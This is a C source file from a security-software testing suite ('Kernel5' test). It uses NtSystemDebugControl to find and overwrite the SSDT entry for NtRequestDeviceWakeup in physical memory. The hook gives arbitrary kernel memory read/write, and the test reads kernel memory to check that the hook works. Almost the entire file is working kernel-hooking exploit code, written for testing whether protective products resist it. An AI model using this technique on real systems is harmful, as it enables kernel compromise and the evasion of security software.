/*

 Security Software Testing Suite - Kernel5 (General bypassing test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Method description:

   * Using system service NtSystemDebugControl(), try to hook NtRequestDeviceWakeup()
     in SSTS.

   * The new hook handler is set to NewNtRequestDeviceWakeup(), which is implemented
     to either read or write arbitrary virtual memory accessible from PASSIVE_LEVEL.

   * Using the hooked service, try to read kernel memory in order to verify
     that the code of the hook handler is executed in the kernel mode.

*/


#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-ssdt.h"

// Structure of command argument to be send to our NtRequestDeviceWakeup().
typedef struct R0_COMMAND
{
  int op_read;                          // TRUE=read, FALSE=write virtual memory
  PULONG addr;                          // address of memory to read/write
  ULONG value;                          // value to be read from/written to the memory
} R0_COMMAND,*PR0_COMMAND;


/*
 Hook handler of NtRequestDeviceWakeup().
 The function accepts command to read or write value from/to memory.

 'command' The command that specifies details about the requested operation.

 Returns NTSTATUS.
*/

NTSTATUS NTAPI NewNtRequestDeviceWakeup(PR0_COMMAND command)
{
  if (command->op_read) command->value=*command->addr;
  else *command->addr=command->value;
  return STATUS_SUCCESS;
}


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("Kernel5","kernel5",argc,argv,&conf,COM_TEST_TYPE_KERNEL5)) return 1;

  char *used_dlls[]={"ntdll.dll","advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  int res=FALSE;

  if (!com_privilege_enable_debug(&err_inf))
    com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

  char krnl_name[MAX_PATH];
  void *krnl_base=NULL;
  if (com_ntkrnl_get_active_kernel_info(krnl_name,&krnl_base,&err_inf))
  {
    int count=0;
    void *table[COM_SSDT_MAX_FUNC_COUNT];
    int params[COM_SSDT_MAX_FUNC_COUNT];
    ULONG ssdt_offset;

    if (com_ntkrnl_get_original_ssdt(table,params,&count,&ssdt_offset,&err_inf))
    {
      void *NtRequestDeviceWakeup_addr=GetProcAddress(GetModuleHandle("ntdll.dll"),"NtRequestDeviceWakeup");
      if (NtRequestDeviceWakeup_addr)
      {
        if (com_verbosity_get()) printf("\"NtRequestDeviceWakeup\" found at 0x%p.\n",NtRequestDeviceWakeup_addr);

        unsigned int NtRequestDeviceWakeup_index=*((PULONG)((size_t)NtRequestDeviceWakeup_addr+1));
        if ((NtRequestDeviceWakeup_index>=0) && (NtRequestDeviceWakeup_index<count))
        {
          if (com_verbosity_get()) printf("Service table index of \"NtRequestDeviceWakeup\" is %u.\n",NtRequestDeviceWakeup_index);

          void *NtRequestDeviceWakeup_krnl_addr=table[NtRequestDeviceWakeup_index];
          if (com_verbosity_get()) printf("Original \"NtRequestDeviceWakeup\" service address is 0x%p.\n",NtRequestDeviceWakeup_krnl_addr);

          int near_by_num=0;
          int phy_slot=0;
          for (int i=0;i<1024*1024*32;i+=PAGE_SIZE)
          {
            unsigned char buf[PAGE_SIZE];
            memset(buf,0,sizeof(buf));

            SYSDBG_PHYSICAL info;
            info.Address.HighPart=0;
            info.Address.LowPart=i;
            info.Buffer=buf;
            info.Request=sizeof(buf);

            NTSTATUS status=ZwSystemDebugControl(SysDbgReadPhysical,&info,sizeof(info),NULL,0,NULL);
            if (NT_SUCCESS(status))
            {
              PULONG fp=(PULONG)buf;
              for (int j=0;j<sizeof(buf)/sizeof(ULONG);j++)
              {
                if (fp[j]>(ULONG)krnl_base)
                {
                  near_by_num++;

                  if ((fp[j]==(ULONG)NtRequestDeviceWakeup_krnl_addr) && (near_by_num>10))
                  {
                    phy_slot=i+j*sizeof(ULONG);
                    break;
                  }
                } else near_by_num=0;
              }
            }

            if (phy_slot) break;
          }

          if (phy_slot)
          {
            if (com_verbosity_get()) printf("SSDT entry of \"NtRequestDeviceWakeup\" found at physical address 0:%p.\n",(void*)phy_slot);

            ULONG addr=(ULONG)NewNtRequestDeviceWakeup;

            SYSDBG_PHYSICAL info;
            info.Address.HighPart=0;
            info.Address.LowPart=phy_slot;
            info.Buffer=&addr;
            info.Request=sizeof(ULONG);

            NTSTATUS status=ZwSystemDebugControl(SysDbgWritePhysical,&info,sizeof(info),NULL,0,NULL);
            if (NT_SUCCESS(status))
            {
              if (com_verbosity_get()) printf("\"NtRequestDeviceWakeup\" hooked.\n");

              R0_COMMAND com={TRUE,krnl_base,0};
              status=ZwRequestDeviceWakeup((HANDLE)&com);
              if (NT_SUCCESS(status))
              {
                if (com_verbosity_get()) printf("Value read from kernel memory is 0x%lX.\n",com.value);

                res=com.value==0x00905A4D;
              } else com_err_set_nc(&err_inf,"Hooked \"NtRequestDeviceWakeup\" failed, error status 0x%lX.\n",status);

              addr=(ULONG)NtRequestDeviceWakeup_krnl_addr;
              status=ZwSystemDebugControl(SysDbgWritePhysical,&info,sizeof(info),NULL,0,NULL);
              if (NT_SUCCESS(status))
                if (com_verbosity_get())
                  printf("\"NtRequestDeviceWakeup\" unhooked.\n");
            } else com_err_set_nc(&err_inf,"Unable to hook \"NtRequestDeviceWakeup\", error status 0x%lX.\n",status);
          } else com_err_set_nc(&err_inf,"Unable to find \"NtRequestDeviceWakeup\" address in physical memory.\n");
        } else com_err_set_nc(&err_inf,"Unable to get service index of \"NtRequestDeviceWakeup\".\n");
      } else com_err_set(&err_inf,"Unable to find \"NtRequestDeviceWakeup\" in \"ntdll.dll\".\n");
    }
  }

  return com_end(res,&err_inf,&conf);
}
